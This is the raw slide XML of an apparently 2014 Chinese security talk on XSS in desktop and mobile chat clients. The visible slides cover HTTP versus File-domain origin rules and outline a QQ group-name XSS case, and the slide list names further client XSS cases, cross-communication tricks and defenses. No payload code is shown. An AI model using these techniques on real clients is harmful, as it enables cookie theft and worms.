          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="514095">
              <a:spcBef>
                <a:spcPts val="3600"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:endParaRPr sz="3168" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="514095">
              <a:spcBef>
                <a:spcPts val="3600"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3168" b="1" dirty="0"/>
              <a:t>HTTP域：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="514095">
              <a:spcBef>
                <a:spcPts val="2800"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2464" dirty="0"/>
              <a:t>弹弹框、盗个Cookie、蠕虫、…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="514095">
              <a:spcBef>
                <a:spcPts val="3600"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3168" b="1" dirty="0"/>
              <a:t>File域：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="514095">
              <a:spcBef>
                <a:spcPts val="2800"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2464" dirty="0"/>
              <a:t>本地文件域，他没有一个明显的主机名与之关联，浏览器也就不能按照正常的方式来进行同源比较。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="514095">
              <a:spcBef>
                <a:spcPts val="2800"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2464" dirty="0"/>
              <a:t>不少客户端使用File域加载资源，使攻击者可以拥有较大的权限，执行危险操作。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 lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="5500"/>
              <a:t>历史上的案例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55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500" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>腾讯QQ群XSS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群资料名称调用WEB接口</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800"/>
              <a:t>修改群名为Payload</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800"/>
              <a:t>查看群资料触发跨站</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="57" name="腾讯QQ群XSS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8300" y="3266791"/>
            <a:ext cx="5334000" cy="494721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9626600" y="1485900"/>
            <a:ext cx="2374900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— Evi1m0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Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>Custom</PresentationFormat>
  <Paragraphs>172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White</vt:lpstr>
      <vt:lpstr>去年跨过的客户端</vt:lpstr>
      <vt:lpstr>About Me</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>WHY?</vt:lpstr>
      <vt:lpstr>同源策略（SOP）</vt:lpstr>
      <vt:lpstr>HTTP域 / File域</vt:lpstr>
      <vt:lpstr>历史上的案例</vt:lpstr>
      <vt:lpstr>腾讯QQ群XSS</vt:lpstr>
      <vt:lpstr>阿里旺旺客户端XSS</vt:lpstr>
      <vt:lpstr>阿里旺旺客户端XSS</vt:lpstr>
      <vt:lpstr>阿里旺旺客户端XSS</vt:lpstr>
      <vt:lpstr>腾讯客户端XSS</vt:lpstr>
      <vt:lpstr>ICQ客户端XSS</vt:lpstr>
      <vt:lpstr>微信红包XSS</vt:lpstr>
      <vt:lpstr>Twitter客户端TweetDeck XSS</vt:lpstr>
      <vt:lpstr>新浪微博IOS客户端XSS</vt:lpstr>
      <vt:lpstr>不同平台下的客户端“特性”</vt:lpstr>
      <vt:lpstr>Windows</vt:lpstr>
      <vt:lpstr>Mac OS</vt:lpstr>
      <vt:lpstr>IOS &amp; Android</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>混合通信所导致的安全隐患 WSL Tip 1</vt:lpstr>
      <vt:lpstr>WSL Tips案例</vt:lpstr>
      <vt:lpstr>WSL Tips案例</vt:lpstr>
      <vt:lpstr>WSL Tips案例</vt:lpstr>
      <vt:lpstr>混合通信所导致的安全隐患 WSL Tip 2</vt:lpstr>
      <vt:lpstr>WSL Tips案例</vt:lpstr>
      <vt:lpstr>WSL Tips案例</vt:lpstr>
      <vt:lpstr>WSL Tips案例</vt:lpstr>
      <vt:lpstr>WSL Tips案例</vt:lpstr>
      <vt:lpstr>WSL Tips案例</vt:lpstr>
      <vt:lpstr>WSL Tips案例</vt:lpstr>
      <vt:lpstr>WSL Tips案例</vt:lpstr>
      <vt:lpstr>WSL Tips案例2</vt:lpstr>
      <vt:lpstr>WSL Tips案例2</vt:lpstr>
      <vt:lpstr>WSL Tips案例2</vt:lpstr>
      <vt:lpstr>WSL Tips案例2</vt:lpstr>
      <vt:lpstr>WSL Tips案例2</vt:lpstr>
      <vt:lpstr>混合通信所导致的安全隐患 WSL Tip 3</vt:lpstr>
      <vt:lpstr>WSL Tips案例</vt:lpstr>
      <vt:lpstr>WSL Tips案例</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>防御策略</vt:lpstr>
      <vt:lpstr>总结</vt:lpstr>
      <vt:lpstr>End.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去年跨过的客户端</dc:title>
  <cp:lastModifiedBy>test test</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2014-08-21T02:07:33Z</dcterms:modified>
</cp:coreProperties>
</file>